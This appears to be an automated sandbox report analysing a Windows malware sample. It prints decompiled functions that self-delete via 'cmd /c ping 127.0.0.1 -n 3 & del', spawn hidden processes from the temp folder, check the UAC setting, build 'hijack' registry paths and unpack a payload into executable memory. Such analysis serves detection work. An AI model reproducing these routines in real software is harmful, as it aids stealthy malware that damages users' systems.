						E1001D330( &_v548,  &_v548);
						E1001D380(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001D000("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D903(_t65, _a4, 0x104,  &_v820);
				}
			}

0x1001dc60
0x1001dc60
0x1001dc60
0x1001dc6d
0x1001de14
0x1001de14
0x1001dc73
0x1001dc88
0x1001dc90
0x1001dc9e
0x1001dca5
0x1001dcb4
0x1001dcbb
0x1001dcc0
0x1001dcc3
0x1001dcd4
0x1001dce1
0x1001dd32
0x1001dd39
0x1001dd3e
0x1001dd41
0x1001dd43
0x1001dd7e
0x1001dd85
0x1001dd99
0x1001dda0
0x1001dda5
0x1001dda8
0x1001ddaa
0x1001ddbf
0x1001ddbf
0x1001ddcd
0x1001ddd2
0x1001ddd2
0x00000000
0x1001ddaa
0x1001dd4c
0x1001dd51
0x1001dd54
0x1001dd56
0x00000000
0x00000000
0x1001dd58
0x1001dd5f
0x1001dd64
0x1001dd67
0x1001dd69
0x00000000
0x00000000
0x1001dd6b
0x1001dd72
0x1001dd77
0x1001dd7a
0x1001dd7c
0x00000000
0x00000000
0x00000000
0x1001dcec
0x1001dcec
0x1001dcf3
0x00000000
0x00000000
0x1001dcfc
0x1001dd01
0x1001dd04
0x1001dd06
0x1001dd08
0x1001dd0f
0x1001dd25
0x1001dd2a
0x1001dd2a
0x1001ddd5
0x1001ddde
0x1001dde0
0x1001ddf1
0x1001ddf6
0x1001ddf6
0x00000000
0x1001de0e

APIs

_memset.LIBCMT ref: 1001DC88
_memset.LIBCMT ref: 1001DCA5
_memset.LIBCMT ref: 1001DCBB
GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
_strcpy_s.LIBCMT ref: 1001DE09

Part of subcall function 1001D2A0: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
Part of subcall function 1001D2A0: RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319

Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
Part of subcall function 1001DAD0: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
Part of subcall function 1001DAD0: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
Part of subcall function 1001DAD0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14

Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E

Strings

Mid2Failed, xrefs: 1001DDEC

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
String ID: Mid2Failed
API String ID: 3782552391-1001836097
Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92

Uniqueness

Uniqueness Score: -1.00%

Function 1001FF30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1001FF30(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E100231AF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A230(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

0x1001ff30
0x1001ff30
0x1001ff33
0x1001ff35
0x1001ff40
0x1001ff41
0x1001ff4e
0x1001ff55
0x1001ff6a
0x1001ff72
0x1001ff87
0x1001ff93
0x1001ffa7
0x1001ffb5
0x1001ffb6
0x1001ffc3
0x1001ffd7
0x1001ffe6
0x1001fff1
0x1001fff6
0x10020000
0x10020008
0x10020012

APIs

_memset.LIBCMT ref: 1001FF6A
_memset.LIBCMT ref: 1001FF87

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FFA7
_sprintf.LIBCMT ref: 1001FFD7

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNELBASE(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

%s%s %s %s, xrefs: 1001FFCB
0011, xrefs: 1001FFB6

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s %s %s$0011
API String ID: 3552933064-2132516514
Opcode ID: e032b5f0e706b41ccc8eebc233dcfcdad72b1f83bb562cf4899ba28d6070bd7a
Instruction ID: 62c6fe1a66a65cb1ec0840fa29cfc7a83406d050d9b9e0d4994b5c30bbe0bab3
Opcode Fuzzy Hash: e032b5f0e706b41ccc8eebc233dcfcdad72b1f83bb562cf4899ba28d6070bd7a
Instruction Fuzzy Hash: C411C8B6C00208ABEB14EBA0DC46FDD7778EB04750F4441A4F619661C1EB787749CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A230, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A230(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				int _t18;
				void* _t27;

				_v24 = 0;
				E1000CF80(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF80(_t27,  &_v20, 0, 0x10);
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
				if(_t18 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}

0x1001a236
0x1001a245
0x1001a24d
0x1001a254
0x1001a25b
0x1001a269
0x1001a28b
0x1001a293
0x1001a299
0x1001a2a3
0x1001a2a9
0x1001a2a9
0x1001a2b6

APIs

_memset.LIBCMT ref: 1001A245
_memset.LIBCMT ref: 1001A269
CreateProcessA.KERNELBASE(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
CloseHandle.KERNEL32(?), ref: 1001A299
CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

D, xrefs: 1001A24D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$CreateProcess
String ID: D
API String ID: 1151464618-2746444292
Opcode ID: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
Instruction ID: 109a0bc55e8301458d6397c35f4bc98ddca4d2c3873fb5e4ea0d57c84511a1e7
Opcode Fuzzy Hash: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
Instruction Fuzzy Hash: 1601E1B590431DABEB00DBD0DC89FEE7779FB44704F140518FA04AB281DBB5A958CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001A2C0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A2C0() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF80(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}

0x1001a2c9
0x1001a2de
0x1001a2e6
0x1001a2fb
0x1001a311
0x1001a32a
0x1001a33b
0x1001a344

APIs

_memset.LIBCMT ref: 1001A2DE
_memset.LIBCMT ref: 1001A2FB
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A311
_sprintf.LIBCMT ref: 1001A32A
WinExec.KERNEL32 ref: 1001A33B

Strings

cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$ExecFileModuleName_sprintf
String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
API String ID: 2874319085-10483710
Opcode ID: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
Instruction ID: dfe06c4bab66860014fe570f5f0bb2c2abbb8c4bd71063b777625ae051172b46
Opcode Fuzzy Hash: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
Instruction Fuzzy Hash: A9F04F7998431C66E720D760EC8AFE9773CAB24704F4405D4F6986A1C5EEF467CC8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00404C40, Relevance: 9.1, APIs: 6, Instructions: 112
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C40() {
				intOrPtr _t75;
				void* _t99;

				 *((intOrPtr*)(_t99 - 0x28))(0, _t99 - 0x138);
				 *(_t99 - 0x1a0) = CreateFileA(_t99 - 0x138, 0x80000000, 3, 0, 3, 0x80, 0);
				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
				 *(_t99 - 0x30) =  *((intOrPtr*)(_t99 - 0x1d8))( *(_t99 - 0x1a0), 0);
				 *(_t99 - 0x188) = VirtualAlloc(0,  *(_t99 - 0x30), 0x3000, 4);
				E00405369( *(_t99 - 0x30),  *(_t99 - 0x188), 0,  *(_t99 - 0x30));
				ReadFile( *(_t99 - 0x1a0),  *(_t99 - 0x188),  *(_t99 - 0x30), _t99 - 0x1f4, 0);
				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
				FindCloseChangeNotification( *(_t99 - 0x1a0));
				E004053A9(_t99 - 0x184,  *(_t99 - 0x188) + 0x45, 4);
				 *(_t99 - 0x19c) =  *(_t99 - 0x30) -  *((intOrPtr*)(_t99 - 0x184));
				 *((intOrPtr*)(_t99 - 0x1f0)) = VirtualAlloc(0,  *(_t99 - 0x19c), 0x3000, 0x40);
				E004053A9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x188) +  *((intOrPtr*)(_t99 - 0x184)),  *(_t99 - 0x19c));
				E00405529( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178, 0xa);
				 *((intOrPtr*)(_t99 - 0x1ac)) = E00405569( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178);
				_t75 = E004050D9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x19c), _t99 - 0x178,  *((intOrPtr*)(_t99 - 0x1ac)),  *((intOrPtr*)(_t99 - 0x1dc)),  *((intOrPtr*)(_t99 - 0x180)),  *((intOrPtr*)(_t99 - 0x2c)),  *((intOrPtr*)(_t99 - 0x148))); // executed
				 *((intOrPtr*)(_t99 - 0x1b0)) = _t75;
				return  *((intOrPtr*)(_t99 - 0x1a4))(0);
			}

0x00404c49
0x00404c6b
0x00404c77
0x00404c8c
0x00404c9f
0x00404cb2
0x00404cd5
0x00404ce1
0x00404cee
0x00404d04
0x00404d15
0x00404d2e
0x00404d4f
0x00404d67
0x00404d7e
0x00404db9
0x00404dbe
0x00404dcf

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00404C65
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00404C9C
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00404CD5
FindCloseChangeNotification.KERNELBASE(?), ref: 00404CEE
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00404D2B
RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00404DC6

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
String ID:
API String ID: 4217122820-0
Opcode ID: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
Instruction ID: 286b678a649b461aa87654d1fb9e4a3dc2712c27ebad769fdf01e4c5803113b1
Opcode Fuzzy Hash: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
Instruction Fuzzy Hash: 1941B9B1E40228AFEB64DBA4CC55FEEB779AB49700F0081D9F60DB6280DA755E80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001A660, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E1002315C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10025ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF80(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A1D0( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CCA3(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001AB0( &_v52, _t81, _v20);
					E10001AB0( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA40(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001AB0( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x1001a660
0x1001a660
0x1001a663
0x1001a665
0x1001a670
0x1001a671
0x1001a67e
0x1001a690
0x1001a695
0x1001a69c
0x1001a6b1
0x1001a6c7
0x1001a6d4
0x1001a6dc
0x1001a6df
0x1001a6e5
0x1001a6e8
0x1001a6eb
0x1001a6ee
0x1001a6f1
0x1001a6f5
0x1001a705
0x1001a719
0x1001a71c
0x1001a720
0x1001a729
0x1001a736
0x1001a73e
0x1001a73f
0x1001a744
0x1001a74a
0x1001a74f
0x1001a751
0x1001a75b
0x1001a75b
0x1001a767
0x1001a775
0x1001a77b
0x1001a785
0x1001a790
0x1001a79a

APIs

_memset.LIBCMT ref: 1001A6B1
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7

Part of subcall function 1001A1D0: FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
Part of subcall function 1001A1D0: FindClose.KERNELBASE(000000FF), ref: 1001A216

_sprintf.LIBCMT ref: 1001A705

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

.exe, xrefs: 1001A72E
baidu.exe, xrefs: 1001A753

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
String ID: .exe$baidu.exe
API String ID: 3164538923-2273953317
Opcode ID: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
Opcode Fuzzy Hash: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E1002319D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A230(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

0x1001fe50
0x1001fe50
0x1001fe53
0x1001fe55
0x1001fe60
0x1001fe61
0x1001fe6e
0x1001fe75
0x1001fe8a
0x1001fe92
0x1001fea7
0x1001feb3
0x1001fec7
0x1001fed5
0x1001fede
0x1001fef2
0x1001ff01
0x1001ff0c
0x1001ff11
0x1001ff1b
0x1001ff23
0x1001ff2d

APIs

_memset.LIBCMT ref: 1001FE8A
_memset.LIBCMT ref: 1001FEA7

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
_sprintf.LIBCMT ref: 1001FEF2

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNELBASE(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

%s%s 200 %s, xrefs: 1001FEE6

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s 200 %s
API String ID: 3552933064-2772210913
Opcode ID: ce90ed0a13cde6149e5664a0142d3e14730c90d1d17c5f30a3d17ad9f80fcc3e
Instruction ID: 328eacdc9b4bdea93596339cccc9e681f099fe81ec3ee43fd56346c21baab8d1
Opcode Fuzzy Hash: ce90ed0a13cde6149e5664a0142d3e14730c90d1d17c5f30a3d17ad9f80fcc3e
Instruction Fuzzy Hash: 5711B6B6C00208ABEB14EBA0DC56FDD7778EB04750F4441A4F619A61C1EB787788CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F9F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF80(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A350( &_v276,  &_v12); // executed
				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA40(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}

0x1001f9f0
0x1001f9f0
0x1001f9f9
0x1001fa0e
0x1001fa16
0x1001fa28
0x1001fa41
0x1001fa58
0x1001fa68
0x1001fa70
0x1001fa74
0x1001fa79
0x00000000
0x1001fa7f
0x1001fa85

APIs

_memset.LIBCMT ref: 1001FA0E

Part of subcall function 1001A350: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379

_strcat_s.LIBCMT ref: 1001FA41

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

_sprintf.LIBCMT ref: 1001FA68

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

hijack, xrefs: 1001FA30
SOFTWARE\Microsoft\%s, xrefs: 1001FA5F

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
String ID: SOFTWARE\Microsoft\%s$hijack
API String ID: 3138967372-3622423033
Opcode ID: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
Opcode Fuzzy Hash: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792

Uniqueness

Uniqueness Score: -1.00%

Function 1001D2A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001D2A0() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;
				long _t18;
				long _t21;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_t18 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8); // executed
				if(_t18 == 0) {
					_t21 = RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20); // executed
					if(_t21 == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x1001d2a6
0x1001d2ad
